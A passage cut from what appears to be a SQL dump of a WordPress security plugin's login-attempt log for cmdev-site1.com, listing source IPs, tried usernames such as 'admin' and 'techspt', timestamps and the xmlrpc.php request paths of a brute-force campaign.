2,'y4JmkzcZjMUIBiGt7E5N8XPs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'rkmetal',0,1681422690.1886,152,'f8WVpLQ064BIznigYj9weFsG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.122.42.249',2256153337,'',0,1681422690.1929,10,'f8WVpLQ064BIznigYj9weFsG','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('103.74.119.218',1732933594,'admin',0,1681426769.0784,152,'Y4IQPdcgTrk1HbN7lei3hCnG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('78.46.136.94',1311672414,'admin',0,1681426769.4794,152,'Pgw15RBbDOZpaYrNtosuHncf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'admin',0,1681426772.9890,152,'Y9vAgfMXOldaJ3bUurCWoEyw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('180.235.151.165',3035338661,'admin',0,1681426786.2377,152,'vLgzGTZbl9QheB10Jqj5arc2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.65.152.207',2671876303,'admin',0,1681426793.3873,152,'eClMvyDmn7VR26SrJubs8tPL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'admin',0,1681426797.0132,152,'WD5jFCMO4AVPEgo9wKZbRLXa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.242.243.105',787673961,'admin',0,1681426814.6579,152,'NtWZIu4A7TBSKhyDjCeH1P3w','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('38.240.226.19',653320723,'techspt',0,1681429199.2228,152,'5Bth1HsjzGmu4W0QRZTJ2LIP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.210.67.162',3000124322,'admin',0,1681431322.5863,152,'c78qwZBHSlaM6PJxyszWfCgF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('41.222.211.123',702468987,'admin',0,1681431322.8501,152,'bV93HzE0rDUWAjBFQLlNXqdm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('171.244.61.154',2884910490,'admin',0,1681431323.8058,152,'782BWlUFh63JHjwGfSkK9ToO','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.90.169.39',2639964455,'admin',0,1681431325.8858,152,'ZayQmXuG8n1CgUt4P5jdoz3s','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.107.113.247',3110826487,'admin',0,1681431327.7714,152,'QDxEUtKaYNol8wIXu509ih76','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.247.133',1152579461,'admin',0,1681431328.0557,152,'pbQHYt2C8ulyEnvcRB574eog','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('205.144.171.194',3448810434,'admin',0,1681431330.8328,152,'HUyVThKPAMf7CtiGs84SnDLJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.98.120',3098043000,'admin',0,1681431342.9630,152,'TzcZBhlIuSX19PgAJHLYRxe7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'admin',0,1681431345.1999,152,'7G0eQxUwRlB6X9c1irH3ptus','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'admin',0,1681431352.3982,152,'PCExmXeMl5JQHWLZ1DwOdgrk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.0.0.250',1593835770,'admin',0,1681431354.2494,152,'NBiIzaKAcShuX7UZ0p62WCTH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('3.34.224.66',52617282,'admin',0,1681431355.2742,152,'RW5vSOnwBuopAPsygQaG3Hzh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.189.112.27',3116199963,'techspt',0,1681431820.0520,152,'drDAaV7mk9BPHYwSFz3MxQNL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.93.182.171',3109926571,'techspt',0,1681432403.2807,152,'poUhZtDeqrI6nluEs0G9KCSM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.221.221.51',1742593331,'admin',0,1681433134.8980,152,'ykJ1C5d6olZsipNgOvWBSc2R','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.170.43.200',1336552392,'admin',0,1681433136.7733,152,'socQ9kXRnfeDUljG70JgAOSZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.232.52',2487806004,'admin',0,1681433138.4235,152,'oUvpr4ecIVTNl0hq8L9itZAH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.59.38.213',2453350101,'admin',0,1681433142.7738,152,'vwtRCSlu4JOIYn6QUVbXFr8p','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.190',1152553406,'admin',0,1681433143.6716,152,'HBV8yGs4vka6peiquNgOA21f','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'test',0,1681433145.6922,152,'jDIYJO0SUQfwVXCa5hTFBLit','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.0.0.250',1593835770,'admin',0,1681433152.8748,152,'hO2uLmMIGKNdcPgH09nkvU3t','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('95.0.0.250',1593835770,'',0,1681433152.8824,10,'hO2uLmMIGKNdcPgH09nkvU3t','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('159.65.152.207',2671876303,'admin',0,1681433155.0714,152,'fjK0qmkl1RX85icuNzPbyprn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.47.21.95',2737771871,'Admin',0,1681433160.4531,152,'DwIzpA1xjYv64qJiRMXKe5Oh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('150.60.157.163',2520554915,'admin',0,1681433167.0295,152,'r3K5aOCovF9Ll6Xyd0PqABUn','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.22',3115727126,'admin',0,1681433167.8396,152,'za5my4VqO0rQRNpWjSKYtPUM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.141.97.148',1737318804,'administrator',0,1681433171.1842,152,'kuYE8Ud7y5Qw1brZRcKH6hNF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('154.0.166.134',2583733894,'aadmin',0,1681438989.2567,152,'tfOXPRMrniBbwd0T4HSc96sz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'laura',0,1681438990.2493,152,'mb9fJNiBaFEADxGpyXY7HORs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('119.18.52.231',1997681895,'admin',0,1681438990.2527,152,'1X4hpFeL5vI6mqHY8PVstUEd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.163.188.46',3265510446,'Admin',0,1681438995.2404,152,'gu2xdXiSa1FTH8IyUfpwADtM','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.148.14',3562705934,'admindemo',0,1681439003.9659,152,'UYZnzqwvPh9VrkxJDSt6IBjf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'proffus',0,1681439004.4892,152,'JPaK5o2TZ0nUGeOEcLDAShzp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.83.210',1152865234,'google_access',0,1681439013.6186,152,'qMch1QlGCvbfWLzVaXRjPieT','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('157.90.161.243',2639962611,'seamus',0,1681439023.3121,152,'dmOFSPgxaAQq92uwW85oIjTJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('180.235.151.165',3035338661,'admin2022',0,1681439029.1975,152,'7BSktnvA38Kj9Hl4RLsqeX6I','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'adminprueba',0,1681440686.4185,152,'4VDF2qxCh0OPMGfe5kUgoKwB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'steve',0,1681440691.7473,152,'ZFu50JCgrhiQajWbfKonYR1p','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'',0,1681440691.7538,10,'ZFu50JCgrhiQajWbfKonYR1p','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('43.240.66.51',737165875,'osasco',0,1681440694.6175,152,'AEuyvUKL2zBskgGIcOXTfr4l','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'haphuong',0,1681440701.8605,152,'QtzkVTnB1sOjWe8bfwRN73K0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.153.159',2694420895,'Admin',0,1681440708.3997,152,'gadxRblXc15mMPLt82uQZkhC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.168.133.147',1755874707,'wpadmin',0,1681440711.2370,152,'Grm7IxYKVjX9o5CZDewNvR4U','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.111.20',3359272724,'universoadmin',0,1681440715.1929,152,'KcqQt0Oy6Uu3oSLEdMPGFYDr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'demo',0,1681440716.4187,152,'gbEyYLu2PZD1lhAzops4i75f','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.83.210',1152865234,'marin',0,1681440720.2124,152,'dSNj0ClK2tQWrDIUeO9Yw5pu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.83.210',1152865234,'',0,1681440720.2164,10,'dSNj0ClK2tQWrDIUeO9Yw5pu','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('198.71.235.60',3326602044,'administrador',0,1681440722.0823,152,'eI7E5Dh8zlGpoVgOTrBFcCsY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('201.148.104.84',3381946452,'vendor',0,1681440722.5240,152,'FRZfriDKCmVG2TzEcoleOUjg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.211',3091979731,'techspt',0,1681441225.5770,152,'h3oLRfgDrl5Kv6pJPTck4Zbm','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.96.211',3098042579,'Admin',0,1681444532.1770,152,'y7Y5FXNqGuSotiIUbzkV9pQ1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.96.211',3098042579,'Admin',0,1681444533.0135,152,'qB6VIanZgE4obhAetFKlN9xJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.168.96.211',3098042579,'',0,1681444533.0204,10,'qB6VIanZgE4obhAetFKlN9xJ','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('184.168.98.120',3098043000,'administrator',0,1681444539.3409,152,'KnTsa1my72DfYEzjWMA4qBIx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.148.14',3562705934,'administrator',0,1681444545.2834,152,'3upHhia1bEmf09ZgFC8kjKqc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'elementorpro',0,1681444548.2211,152,'ohmwiRD6qKsWEj1a45YAOxLF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.83.210',1152865234,'iut_stro',0,1681444556.7243,152,'eVo612fIuKQkUq3svBdLZjz9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('41.111.172.42',695184426,'admin',0,1681444563.1954,152,'1JlhIjn6p8Q7XNrBRubEwPOV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('150.60.157.163',2520554915,'abhisheksingh7285',0,1681444565.8267,152,'VNyilhpHzvuUaegTxsPDMB6q','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('5.9.178.235',84521707,'webmaster',0,1681448242.3747,152,'xg6U4OJboD95Eswnp7XIWrlR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.172.168.158',2746001566,'redakteur',0,1681448243.2888,152,'P5cFALHKi3yrBgkTWhIsbZlC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.218.252.12',635108364,'user',0,1681448245.3665,152,'w2vSLdBg4uRoyZVt3Y6KMOWx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'root',0,1681448250.0430,152,'hNZO3n52Ww8IxuK19A7YsDrF','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('192.241.166.226',3237062370,'meli',0,1681448256.0502,152,'rXBoAyblhewJkRT109FMPLuS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('116.202.233.238',1959455214,'picabo',0,1681448263.9478,152,'jVQSA4HcYfbgCUo8iNsXeKqt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.254.221.76',872340812,'sophie',0,1681448269.3880,152,'4JfAuNFjarYPULp0KMxXhykH','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.119.88.55',3111606327,'saikat562',0,1681448269.4551,152,'yqZnfRLxcYjamztsC0e28uKU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'thespace',0,1681448275.6519,152,'qM3aXnTAHF4SvWk8z7geQOR1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('123.30.238.182',2065624758,'ryan',0,1681448279.2875,152,'i2w0emzKxf4dYLbyXq7ZtjHc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'cristina',0,1681448292.1627,152,'AqNtCVFzHEbjKhvcLYmue2d9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('199.16.130.127',3339747967,'thomas',0,1681451086.3309,152,'liIGEXoNBcT3f1JzvtM9kda5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('176.119.210.163',2960642723,'clearsense',0,1681451100.0401,152,'p4Q7ZC9KTBzkPahosFtIY6yd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.195.56.33',767768609,'metal',0,1681451101.3880,152,'sRq3DbleH7gAu9N21nzp6x0T','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.46.133.245',623805941,'artifexnet',0,1681451110.5908,152,'nPIzySWkgY9DdXiasNtrpmJE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'test',0,1681451111.1168,152,'2C76Emf8uqb3IjdphyZDNcSA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.148.14',3562705934,'Admin',0,1681451122.8917,152,'lGNev4X3cSYabympu8q7RJAB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.178.146.199',867340999,'innovatecreation',0,1681451127.8391,152,'EPomLBRJXSFO3K6hGfCZbika','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.195.25.73',767760713,'roberto',0,1681451133.2625,152,'hkgCa2GHMNscz50nvuYQjTfr','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.20.75.229',1091849189,'adam',0,1681451162.6542,152,'z7efTgGktA6bdyF9xP2mOHRq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.200.23.149',1741166485,'teste',0,1681451169.5428,152,'kceyaWzj7l5df0bVuXBA2K4H','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.221.221.51',1742593331,'activameservicio',0,1681451170.4477,152,'YzoSmf3r0TxE6MiIe4vVJuC8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('1.20.253.226',18152930,'ashishparakh88',0,1681452961.4665,152,'WdQsbrNYPOfVnkF63CvzjXMc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.65.248.18',1380055058,'mainsiteadmin',0,1681452969.8720,152,'58DXBsJOUaRv0Cct3Lenw6gE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('212.90.148.14',3562705934,'shopmanager',0,1681452970.2939,152,'bD36NrJdgeKFIv8WHkBhx25X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.208.182.231',3117463271,'user',0,1681452979.2177,152,'ArmpQ1iWjKdMB8os5HXVNzu7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.58.112.226',3359273186,'gnhub',0,1681452987.8486,152,'hPt3W6Nl7oOyxiLVSarQfs5w','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.183.179.155',1152889755,'eo',0,1681452990.0963,152,'3oVhcAq6TOwjUy2kNrZzJ4ml','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('176.119.210.163',2960642723,'quantri',0,1681452991.6222,152,'5IZpuVg3FBYWLE2A0DdqGrms','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.247.133',1152579461,'admin',0,1681453004.3915,152,'hseAB8LvRiWNUXfIOrda5mkC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.20.75.229',1091849189,'admin',0,1681453005.5042,152,'YniwuUpKvL3GotDNgEXq9Tke','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.223.16',2388516624,'enamad',0,1681453014.9549,152,'YTxOVpWQfPszLo1vGwnjmRZe','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.179',2249438131,'techspt',0,1681454611.0680,152,'E6auxhH4VwFXsy7PzIOKY938','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.40',3583549736,'techspt',0,1681455700.3675,152,'nQ0clDHYOt9oiJmE7bxqd5Rp','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('37.120.132.83',628655187,'techspt',0,1681456259.3809,152,'EeD0XWbOFm9gL1akpVM8CPS7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('82.102.27.171',1382423467,'techspt',0,1681458392.2751,152,'xcEKoX4AOtf0BGeNg3jk2drY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.2.176',1556939440,'techspt',0,1681459276.8019,152,'cQwrzmlCEf7kaJsNW5qxVL39','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.32.201.69',2988493125,'techspt',0,1681459277.2629,152,'DT4apelMwiqPW2BbjH07dYRA','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('41.111.172.42',695184426,'techspt',0,1681459285.6824,152,'1OTpqwhegE07WN4ulaZ9vmXU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.85.208.215',3344290007,'techspt',0,1681459286.4608,152,'Mb1mfZtlKYDT9Xnwipq8J2PO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681459299.5462,152,'9PDWQaOIrqGi68onbztd3Thm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.37.121.239',908425711,'techspt',0,1681459302.7004,152,'e1x8Pi3jhRUCgIb0dBnuZtfl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.2.5.88',3103917400,'techspt',0,1681459306.9005,152,'U0XhgFe2Jqoa5YuMAft8GCWz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.32.41.71',1696606535,'techspt',0,1681459308.5665,152,'b4pTDxA3Che8qLw7XsryHScY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('43.155.103.11',731604747,'techspt',0,1681459314.1526,152,'7mcrU8DLx0Z2HTMgh6zIwpAW','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'techspt',0,1681459321.8062,152,'mLQDUoSVtrakdeBHjYN48KuR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('34.87.13.139',576130443,'',0,1681459321.8091,10,'mLQDUoSVtrakdeBHjYN48KuR','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('148.72.210.101',2487800421,'techspt',0,1681459329.6054,152,'HYz7Cl9rSN8Rp2UdG0iQManZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.38.23.179',3257276339,'',0,1681459823.6666,55,'AJZn42QFvLwryzeMfVhRlgsx','','19|0|0|0|cmdev-site1.com/assets/admin/plugins/plupload/examples/upload.php',0,19,0),('103.117.180.72',1735767112,'techspt',0,1681461380.6891,152,'iyYmGtUxrl04czNq2KJdoOwS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('3.1.211.113',50451313,'techspt',0,1681461381.7445,152,'rQF1MWdus5wNl37ADpOUZxJ4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.145.59',1503891771,'techspt',0,1681461382.4057,152,'WC1Z9Nkxz2q6VaXUbBoDHmT0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'techspt',0,1681461390.8992,152,'v4ZaO5lY7n0fKQpiV8WL9ATj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('43.155.116.117',731608181,'techspt',0,1681461397.5857,152,'VM1N35oKyBxvSnPcm2GtYzei','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('52.69.122.222',876968670,'techspt',0,1681462139.0202,152,'0mhwqK8aUzOu3pTDPjLobYCE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('219.94.129.200',3680403912,'techspt',0,1681462144.4513,152,'82HYLpoADXykrvqSwaFKiOTZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.38.249.174',774306222,'techspt',0,1681462149.8427,152,'7ISuxXTtMZmoHK5qidQjcNFC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('101.34.78.12',1696747020,'techspt',0,1681462152.3418,152,'adL3gAkw4MP7YVDUq1JmoGy2','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.160.206',2672140494,'techspt',0,1681462162.0537,152,'aPe0FW4MsLKy7RZmDuX2VvlS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.62.105.205',2990434765,'techspt',0,1681462162.1933,152,'JepnQcwFUARvEslBKy7d8jM4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('173.231.231.50',2917656370,'techspt',0,1681462165.8991,152,'oUJzvVSYAdBZ2e1bKuX84jEq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.145.59',1503891771,'techspt',0,1681462173.4030,152,'Ye1ZGKVqap7oLu9l4EbHx58I','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('89.163.145.59',1503891771,'',0,1681462173.4090,10,'Ye1ZGKVqap7oLu9l4EbHx58I','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('176.56.56.133',2956474501,'techspt',0,1681463335.4649,152,'8j06JoyTOYkC1iI5ZHFBzLnV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.172.80.82',531386450,'techspt',0,1681463339.6293,152,'UL9Nfcqik4HgayMDvYFjIRdS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'techspt',0,1681463343.0430,152,'6uzdvxRGJrlhIA9QDM4nHqwB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.7.190.240',2634530544,'techspt',0,1681463343.1001,152,'0pU2b8Ix4eWJVAEnoijtdhR7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.56.207.178',792252338,'techspt',0,1681463352.3697,152,'idKhYMb5vNXcL04Q7jZDzmfa','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681463355.4513,152,'6z9OmviNL4CEVB3UxktlQoJY','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('217.18.33.11',3641843979,'techspt',0,1681463361.1014,152,'7CTv3P2cr5EUnihIWRgHzfuJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('202.172.28.70',3400277062,'techspt',0,1681463365.6487,152,'J0dR9qEMnpxozCyeBu6bjKN1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('196.189.44.24',3300731928,'techspt',0,1681463371.7698,152,'AHrc6Ow8Tfy0q9gm4LtpUV1D','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('87.101.92.171',1466260651,'techspt',0,1681463774.7658,152,'XwJeabp6CyHYPmnc1o3qxi2S','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('193.37.254.3',3240492547,'techspt',0,1681464236.2253,152,'axiehGdXcgKqQu2IJymNkLpz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.160.206',2672140494,'techspt',0,1681465513.8425,152,'8KPgUuWIGcm7pMJiyXEtxved','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.160.206',2672140494,'techspt',0,1681465513.8439,152,'Dg0WSUQRwl83Tbt51vJm62Vu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.69.160.206',2672140494,'',0,1681465513.8534,10,'8KPgUuWIGcm7pMJiyXEtxved','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('139.162.58.251',2342664955,'techspt',0,1681465515.3405,152,'TJQqGZSBsbL8dImE5oOtpY6X','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('59.126.108.85',998141013,'techspt',0,1681465521.0804,152,'UJbq2NFOB3sAPGjHZurTyV6c','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('160.153.153.159',2694420895,'techspt',0,1681465525.1732,152,'1qLOIUAs0MDbQEH7yW2w6z8r','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.122.120.71',2256173127,'techspt',0,1681465538.4437,152,'cLwEieTgn8RpsUVaqOouGvzA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('216.238.104.161',3639503009,'techspt',0,1681465544.4479,152,'EnljDJCSIxyQmKqgMi2LRkod','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.80.163.64',575710016,'techspt',0,1681465551.1565,152,'kFRInqO3JpjZBX5ESPohuAHw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681465551.7463,152,'tSEnADTNM3kPCHov1Uqm8JX9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'techspt',0,1681465556.4388,152,'GDMe3hf7sAmR2avu4COHtJoI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.101.161.81',1734713681,'',0,1681465556.4461,10,'GDMe3hf7sAmR2avu4COHtJoI','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('34.80.163.64',575710016,'techspt',0,1681465557.2130,152,'rdGb5nFLtki3J7m9l20Sx8NI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.80.163.64',575710016,'',0,1681465557.2188,10,'rdGb5nFLtki3J7m9l20Sx8NI','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('207.180.207.149',3484733333,'techspt',0,1681465568.2578,152,'nRoUlBGrzNx28SOE0gajhqmK','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.33.83.85',757158741,'techspt',0,1681465600.1335,152,'OfnN74bI1ZduMxj8vwt925iB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.98.102.243',2372036339,'techspt',0,1681466648.2876,152,'NMtCP93LWin6OEwxclUz5Ra1','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('200.63.100.19',3359597587,'techspt',0,1681467000.7021,152,'KXRWaqklzOhPCDdnIBxwo6TS','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('165.22.211.204',2769736652,'techspt',0,1681467000.8467,152,'VoaD17b5R6w9S3uGqHXkMU0W','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.7.190.240',2634530544,'techspt',0,1681467004.0269,152,'yf9Q2RHXGqJdCEUawOjbs7pI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('18.218.139.173',316312493,'techspt',0,1681467009.9686,152,'A8qZRTMyXfuk0jSgQamNJiYb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('182.50.151.70',3056768838,'techspt',0,1